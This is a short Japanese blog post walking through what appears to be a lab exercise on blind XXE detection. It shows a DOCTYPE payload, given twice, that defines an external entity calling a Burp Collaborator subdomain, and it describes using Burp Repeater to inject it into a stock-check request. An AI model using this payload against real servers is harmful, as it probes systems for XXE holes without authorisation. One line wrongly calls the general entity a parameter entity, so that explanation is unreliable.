Hello there, ('ω')ノ
帯域外インタラクションを伴うブラインドXXEを。
XML入力を解析するが、結果を表示しない「在庫確認」機能がありらしく。
今回は、 外部ドメインとの帯域外相互作用をトリガーすることで。
ブラインドXXEの脆弱性を検出できるようで。
まずは、Check stockを。
XMLのリクエストをリピータへ。
下記の外部エンティティ定義を挿入して。
<!DOCTYPE stockCheck [ <!ENTITY xxe SYSTEM "http://YOUR-SUBDOMAIN-HERE.burpcollaborator.net"> ]>
コラボレータを起動して、payloadをコピーして。
コピーしたpayloadをBurpCollaboratorサブドメインに挿入して。
productId番号を外部エンティティへの参照に置き換えてSendすると。
ペイロードの結果がHTTPレスポンスに表示されて。
クリアできた。
このXXEペイロードは。
xxeと呼ばれるXMLパラメータエンティティを宣言して。
そして、DTD内のエンティティを使用して。
これで、攻撃者のドメインへのDNSルックアップとHTTPリクエストが発生して。
攻撃が成功したことを確認して。
<!DOCTYPE stockCheck [ <!ENTITY xxe SYSTEM "http://YOUR-SUBDOMAIN-HERE.burpcollaborator.net"> ]>
Best regards, (^^ゞ